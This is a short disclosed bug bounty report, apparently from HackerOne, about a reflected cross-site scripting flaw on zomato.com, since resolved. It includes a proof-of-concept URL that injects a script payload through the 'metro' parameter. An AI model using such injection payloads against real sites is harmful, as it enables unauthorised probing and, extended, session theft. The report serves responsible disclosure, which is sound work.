XSS on zomato.com

Disclosed: 2016-08-14 11:31:47 By spam404 To zomato
Unknown
Vulnerability Details
I found an XSS on zomato.com Here's a POC (works even on Chrome) - https://www.zomato.com/doha/drinks-and-nightlife-in-al-ghanim?metro='-prompt('XSS')-' I hope this helps :)
Actions
View on HackerOne
Report Stats
  • Report ID: 143294
  • State: Closed
  • Substate: resolved
  • Upvotes: 3
Share this report